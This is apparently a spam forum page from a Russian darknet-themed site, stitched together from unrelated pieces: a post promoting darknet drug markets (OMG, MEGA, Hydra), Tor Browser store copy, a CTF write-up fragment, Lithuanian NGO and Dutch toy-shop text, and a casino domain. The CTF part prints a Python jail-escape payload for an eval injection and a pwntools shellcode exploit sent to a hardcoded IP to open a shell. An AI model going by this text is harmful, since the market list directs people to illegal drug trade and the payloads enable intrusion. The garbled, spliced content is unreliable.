Правильная ссылка на ramp новая

Vyfydutu

Специалист
Подтвержденный
Сообщения
256
Реакции
43
Уважаемые пользователи RuTOR , Все сайты из нашего списка проверены и находятся онлайн, их нет в скам листах. Остерегайтесь фишинг сайтов и помните об уголовной ответственности за незаконные сделки. Подборка официальных сайтов по продаже веществ от форума Rutor носит исключительно информативный характер.

1. OMG!OMG - MOST ADVANCED DARKMARKET

Эта площадка существует довольно давно и в этот период она медленно развивалась в тени гидры. В настоящее время это ведущий сайт по продаже веществ в даркнете.
 

 

2. MEGA - DARKNET MARKET

Благодаря хорошей подготовке и листингу на зарубежных сайтах площадка смогла составить конкуренцию в стабильности и доступности, чего не смогли ее конкуренты, но все же она уступает по полпулярности площадке OMG!OMG!

 

3. HYDRA - Возрождение легенды.

Идут работы по восстановлению всеми любимой гидры, но все не так просто как казалось ранее, совсем скоро она будет доступна, а сейчас нам остается только ждать релиза от команды HYDRA.

 

________________________
RUTOR — Главная торговая и информационная площадка в сети Tor.



Utusubeq

Юзер
Сообщения
116
Реакции
2
Правильная ссылка на ramp новая
Tor Browser is com the only official mobile browser supported by the Tor Project, developers of the world’s strongest tool for privacy and freedom online.Tor Browser will ALWAYS be free, but donations make it possible. The Tor
Project is a 501(c)(3) nonprofit based in the US. Please consider making
a contribution today to help us resist the surveillance pandemic. Every
dollar makes a difference.
https://www.torproject.org/donate/donate-usetor-gpLearn how to report bugs and provide feedback at https://support.torproject.org/misc/bug-or-feedback/!BLOCK TRACKERS
Tor Browser isolates each website you visit so third-party trackers and ads can’t follow you. Any cookies automatically clear when you’re done browsing.DEFEND AGAINST SURVEILLANCE
Tor Browser prevents someone watching your connection from knowing what websites you visit. All anyone monitoring your browsing habits can see is that you’re using Tor.RESIST FINGERPRINTING
Tor aims to make all users look the same, making it difficult for you to be fingerprinted based on your browser and device information.MULTI-LAYERED ENCRYPTION
When you use Tor Browser for Android, your traffic is relayed and encrypted three times as it passes over the Tor network. The network is comprised of thousands of volunteer-run servers known as Tor relays. Watch this com animation to learn more about how it works:BROWSE FREELY
With Tor Browser for Android, you are free to access sites your local internet service provider may have blocked.THIS APP IS MADE POSSIBLE BY DONORS LIKE YOU
Tor Browser is free and open source software developed by the Tor
Project, a nonprofit organization. You can help keep Tor strong, secure,
and independent by making a donation. https://www.torproject.org/donate/donate-usetor-gpLearn more about Tor Browser:
- Need help? Visit https://tb-manual.torproject.org/mobile-tor/.
- Learn more about what’s happening at Tor: https://blog.torproject.org
- Follow the Tor Project on Twitter: https://twitter.com/torproject
- Learn how to report bugs and provide feedback: https://support.torproject.org/misc/bug-or-feedback/ABOUT THE TOR PROJECT
The Tor Project, Inc., is a 501(c)(3) organization developing free and open source software for privacy and freedom online, protecting people from tracking, surveillance, and censorship. The Tor Project’s mission is to advance human rights and freedoms by creating and deploying free and open source anonymity and privacy technologies, support their unrestricted availability and use, and further their scientific and popular understanding.
 

Ryciryra

Местный
Сообщения
40
Реакции
24
)) && (((b % 40624) == 30931)))) return 3; if (!(((c % 99892) == 92228) && (((c % 45629) == 1080)) && (((c % 24497) == 12651)))) return 4; if (!(((d % 54750) == 26981) && (((d % 99627) == 79040)) && (((d % 84339) == 77510)))) return 5; printf("Congratulations %s is flag\n",buf); return 0;}First of all, I think about use something like z3, or any SAT that could give me the valid number. But z3 took a lot of time, so I decided to look deeper... Yes, you could finger out there is a pattern (x % number1 == number2), so you could apply Chinese remainder theorem to get a, b, c.Reverse 200:
This is a .pyc file, which is a file contain python byte-code. As usual, for byte-code relative problems, I search for some python byte-code decompiler and found pycdc.
After decompil, you should get something like this# Source Generated with Decompyle++# File: rev200_bot_7b541a1.pyc (Python 2.7)import configimport tracebackimport refrom base64 import *from twx.botapi import TelegramBot, ReplyKeyboardMarkup, ReplyKeyboardHidesec_state = { }def process_message(bot, u):Warning: Stack history is not empty! if u.message.sender and u.message.text and u.message.chat: chat_id = u.message.chat.id user = u.message.sender.username reply_hide = ReplyKeyboardHide.create() print 'user:%s mes:%s' % (user, u.message.text) if user not in sec_state: sec_state[user] = { 'mode': 15, 'stage': 7 } cmd1 = u.message.text.encode('utf-8') a = re.findall('(\\/\\w+)\\s*(.*)', cmd1) if a: cmd = a[0][0] data = a[0][1] if cmd == '/help': bot.send_message(chat_id, 'Usage: \n\n/help - show this help\n/enter - enter secret mode\n', reply_markup = reply_hide) if cmd == '/enter': keyboard = [ [ '-7-', '-8-', '-9-'], [ '-4-', '-5-', '-6-'], [ '-1-', '-2-', '-3-'], [ '-0-']] reply_markup = ReplyKeyboardMarkup.create(keyboard) bot.send_message(chat_id, 'please enter access code', reply_markup = reply_markup).wait() if sec_state[user]['mode'] == 0 and cmd == '/7779317': ddd = b64decode(data) bot.send_message(chat_id, eval(ddd)) a = re.findall('-(\\d+)-', cmd1) if a: num = a[0] if int(num) == sec_state[user]['stage']: sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10 sec_state[user]['mode'] = sec_state[user]['mode'] - 1 if sec_state[user]['mode'] < 0: sec_state[user]['mode'] = 0 if sec_state[user]['mode'] == 0: bot.send_message(chat_id, 'Secret mode enabled!', reply_markup = reply_hide).wait() else: print 'NO', num, sec_state[user]['stage'] bot.send_message(chat_id, 'Invalid password!', reply_markup = reply_hide).wait() sec_state[user]['mode'] = 15 bot = TelegramBot(config.token)bot.update_bot_info().wait()print bot.usernamelast_update_id = 0while True: updates = bot.get_updates(offset = last_update_id).wait() try: for update in updates: if int(update.update_id) > int(last_update_id): last_update_id = update.update_id process_message(bot, update) continue continue except Exception: ex = None print traceback.format_exc() continue So this is a kind of chat-bot server based on Telegram.
There is eval function inside,  bot.send_message(chat_id, eval(ddd)), so I need to control ddd which is a base64 decoded string from data we sent. Before that, I need to enter Secret mode by enter correct access code (0-9).
First, set sec_state[user]['mode'] = 0; First time, stage init to 7, that changed everytime you press the correct key; But if I dont remember the stage, I still could find out by bruteforce from 0 to 9, if I didn't recv incorrect message that's mean I pressed the correct one; then by use the following script, I'm able to access secret area;#coding: utf-8sec_state = { }user = "A"sec_state[user] = {'mode': 15,'stage': 7 } # bruteforce numbersec_state[user]['mode'] = 15r = []while 1: num = sec_state[user]['stage'] r.append(num) print "-%d-" % num sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10 sec_state[user]['mode'] = sec_state[user]['mode'] - 1 if sec_state[user]['mode'] < 0: sec_state[user]['mode'] = 0 if sec_state[user]['mode'] == 0: breakprint sec_state[user]['mode']Next, this is a pyjail, so I can't execute normal python command...
So, final payload is `str(().__class__.__base__.__subclasses__()[40]("flag","r").read())`or `/7779317 c3RyKCgpLl9fY2xhc3NfXy5fX2Jhc2VfXy5fX3N1YmNsYXNzZXNfXygpWzQwXSgiZmxhZyIsInIiKS5yZWFkKCkp`Reverse 300:
Let's get some fun.let reverse this (or not?), look at handler (the main function)ssize_t __cdecl handler(int fd){ ssize_t result; // [email protected] unsigned int buf; // [sp+20h] [bp-18h]@1 int v3; // [sp+24h] [bp-14h]@1 char *v4; // [sp+28h] [bp-10h]@4 int v5; // [sp+2Ch] [bp-Ch]@4 buf = 0; setuid(0x3E8u); seteuid(0x3E8u); setgid(0x3E8u); setegid(0x3E8u); result = recv(fd, &buf, 4u, 0); v3 = result; if ( result == 4 ) { result = buf; if ( buf <= 0xC8 ) { v4 = (char *)mmap(0, buf, 7, 33, -1, 0); v3 = recv(fd, v4, buf, 0); result = crc32(0, v4, buf); v5 = result; if ( result == 0xCAFEBABE ) { result = filter(v4, buf) ^ 1; if ( !(_BYTE)result ) result = ((int (*)(void))v4)(); } } } return result;}So the basic idea is make result == 0xCAFEBABE, so the program will execute v4 as shellcode (function pointer), but you also need to bypass the filter function - check if contain any of 0x0, 0x1, 0x2f, 0x68, 0x73 ( so I can't use sh in plaintext)then exit; So, I did the following step:1. Find a program that can make crc32 of my shellcode equal 0xCAFEBABE
2. Make a great shellcode and Bypass filter.
By search google for everything, the answer for problem 1 is force-crc32.
Currently I'm also trying to learn some binary exploit method, write a shellcode isn't hard (hint xor), but if there is any framework that's good enough as pwntools , you shoud try at least once.
Basicaly, I import pwns and let pwntools do the rest;from pwn import *import socket, struct, telnetlibdef getCRC(data): import subprocess with open('/tmp/12', 'wb') as f: f.write(data + "123456") subprocess.check_output(['python', 'forcecrc32.py', '/tmp/12', str(len(data)+1) , 'CAFEBABE']) with open('/tmp/12', 'rb') as f: data = f.read() return datadef crc32(data):# recheck import zlib return (zlib.crc32(data)) & 0xffffffffd = ""d += asm(pwnlib.shellcraft.i386.linux.dup2(4,0))d += asm(pwnlib.shellcraft.i386.linux.dup2(4,1))# i need dup2 because the program use itself as serverd += asm(pwnlib.shellcraft.i386.linux.sh())fsc = pwnlib.encoders.encoder.encode(d, '\n\x01\0\x2f\x73\x68')print len(fsc)fsc = getCRC(fsc) # it didn't contain any blocked char, so i dont need to re-generate again.print hex(crc32(fsc))#yes, i love my custom socket lib 🙁s = socket.create_connection(("78.46.101.237", 3177))s.send(p32(len(fsc)))s.send(fsc)s.send("\n")s.send("cat flag*\n") print s.recv(1024)To be continued....Related
Правильная ссылка на ramp новая
 

Barygyk

Юзер
Сообщения
62
Реакции
7
Homeadmin2020-09-22T03:05:47+03:00KAS MES ESAMESOTAS – tai nevyriausybinė organizacija, kuri teikia socialines bei psichologines paslaugas ir savo veikla prisideda kuriant vaikų, jaunimo ir jų šeimų gerovę. Mūsų misija – įtvirtinti žmogaus vertę, ypatingą dėmesį skiriant vaikų ir suaugusiųjų ugdymui.Mūsų tikslai:siekti žmonių gerovės, jų įvairiapusės socialinės integracijos, ypatingą dėmesį skiriant asmens ugdymui, pirmiausia stiprinant jo vertę ir orumą;stiprinti šeimą kaip pirminę ir svarbiausią asmens formavimosi aplinką, skleisti pozityvias nuostatas šeimos instituto atžvilgiu, suteikti socialinę – ugdomąją paramą vaikams bei jų šeimoms, siekiant jų visaverčio gyvenimo;skatinti solidarumą bei partnerystę tarp NVO ir valstybinių socialinių institucijų, kurti bendradarbiavimo tinklą, kad būtų visapusiškiau atsakoma į žmonių, kuriems reikia pagalbos, poreikius;prisidėti kuriant efektyvesnę socialinę politiką, susijusią su vaikų, jų šeimų, jaunimo gerove, bei socialinę kultūrą, grindžiamą bendražmogiškomis vertybėmis.NAUJIENOSKviečiame tėvus, kurie augina paauglius nuo 10 m., į Pozityvios tėvystės įgūdžių mokymus. Tai tęstiniai, 8 susitikimų mokymai, kurie vyks kartą per savaitę nuo 2022 m. birželio 6 d. iki [...]„Jo prisikėlimas nėra praeities dalykas, bet turi pasaulį persunkusios gyvybinės jėgos. Kur visa atrodo jau mirę, visur vėl ima rodytis prisikėlimo daigai. Tai – neprilygstama jėga. Tiesa, dažnai atrodo, kad [...]Balandžio 15 diena - SOTO gimtadienis! Šiandien, lygiai prieš 20 metų, savo veiklą Vilniaus senamiestyje, šalia Aušros Vartų, pradėjo kelių draugų iniciatyva įkurta nevyriausybinė organizacija SOTAS. Du dešimtmečius išlikti aktyviai ir [...]Tikime, kad jau esate skyrę 1,2 % GPM paramą Jūsų pasirinktai organizacijai ar iniciatyvai! Bet jei dar ne, labai skatiname tai padaryti! Skirti savo 1,2 % yra labai paprastai ir [...]VšĮ SOTAS vykdo globos centro funkcijas Vilniaus mieste ir teikia nemokamą socialinę ir psichologinę pagalbą bei paramą esamoms ir būsimoms globėjų ir įtėvių šeimoms, budintiems globotojams, vykdo budinčių globotojų, globėjų [...]VšĮ SOTAS kviečia globėjus, įtėvius ir budinčius globotojus į nemokamą praktinį seminarą „Kaip su vaikais kalbėtis apie lytiškumą?“, kurį ves psichologė Kristina Girštautė. Seminaras vyks nuotoliniu būdu. Seminaras skirtas globėjams, [...]TAPKITE GLOBĖJAIS ARBA ĮTĖVIAIS„Priėmimas ir pasidalijimas yra vienintelis žmogiškai vertingas ryšys, nes tik taip žmogus atskleidžia savo tikrą žmogiškumą, kuris yra santykis su Begalybe“.(Kun. Luigi Giussani)DAUGIAUKviečiame savanoriauti vaikų dienos centreKviečiame įvairaus amžiaus savanorius dalyvauti mūsų veikloje ir savanoriauti vaikų dienos centre. Savanoriai gali padėti pamokų ruošoje, prisidėti ir organizuoti ugdomąsias veiklas, vykti kartu į stovyklas. Vaikams – tai unikali galimybė susitikti su įvairiais žmonėmis, kurie sėkmingai renkasi savo gyvenimo kelius ir turi kuo pasidalinti. Savanorių atėjimo dėka vaikai lavina savo socialinius įgūdžius, lengviau priima kito skirtingumą, laisviau įsitraukia į atvirą bendravimą su suaugusiu žmogumi. Dėl savanorystės kviečiame kreiptis telefonu 8 5 2121453 arba el. p. [email protected]ŪSŲ RĖMĖJAI IR PARTNERIAI
 

Kujumuve

Юзер
Сообщения
38
Реакции
23
HomeWat hebben wij?SpeelgoedVerkeerTrakteren0-3jaarBouwenWetenschapBuitenspelenPuzzelsMuziekSpeelgoedDiversVerkleedBeestenboelSpellenBoekenPrentenboekenLuister-en geluidsboekenSprookjesen voorleesKlassiekers1eboeken2-6jaar6-9jaar en moppen9-12jaar12+informatiefoefenenEngelsKnutselTekenenKleiPapierVerfLijmTextielKleur-en knutselboekenGlitterFrutselsDecoreren /stickersKnutselsetjesGereedschapHebbenSchriftenKaartenrugzakkenserviessieradenback toschoolfunctioneelvolwassenenfeestinvulboekenhebbenhebbenWie zijnwij?Wat wetenwij?Speelgoed& SpelletjesBoekenKnutselspullenZodoe je datFlessenpostErwas eens…ContactEnglishdoor KnutselFrutsel 19 februari 2018Verlies jezelf in de mooisteboeken, met of zonder plaatjes, in verhalen over het echte leven ofverzonnen werelden en mooie sprookjes. Laat je voorlezen of leeslekker zelf. Verdwaal in werelden die niet lijken op de jouwe, oftoch een beetje? Lach om goede grappen, oefen met lezen of vergrootje kennis over wat dan ook. Kijk prachtige platen en tekeningen, enwees een tijdje niet jezelf, reis en verdwijn terwijl je gewoon opje bed ligt.SaveSaveOp deze pagina vind je voorbeelden van producten uit onzefysieke winkel. Wil je online bestellen, ga dan naar onze webshop.PRENTENBOEKENLUISTER- EN GELUIDSBOEKENSPROOKJES EN VOORLEESKLASSIEKERS1E BOEKEN2-6 JAAR6-9 JAAR EN MOPPEN9-12 JAARINFORMATIEFOEFENENENGELSKnutsel Frutsel | Hoofddorpweg 19-21 | 1059 CT Amsterdam | KvK66751780 | © 2017 - Knutsel Frutsel | All Rights Reserved. Design +Branding byKatrienHomeWat hebben wij?SpeelgoedVerkeerTrakteren0-3jaarBouwenWetenschapBuitenspelenPuzzelsMuziekSpeelgoedDiversVerkleedBeestenboelSpellenBoekenPrentenboekenLuister-en geluidsboekenSprookjesen voorleesKlassiekers1eboeken2-6jaar6-9jaar en moppen9-12jaar12+informatiefoefenenEngelsKnutselTekenenKleiPapierVerfLijmTextielKleur-en knutselboekenGlitterFrutselsDecoreren /stickersKnutselsetjesGereedschapHebbenSchriftenKaartenrugzakkenserviessieradenback toschoolfunctioneelvolwassenenfeestinvulboekenhebbenhebbenWie zijnwij?Wat wetenwij?Speelgoed& SpelletjesBoekenKnutselspullenZodoe je datFlessenpostErwas eens…ContactEnglishslottica-casino.com
 

Похожие темы

Сверху Снизу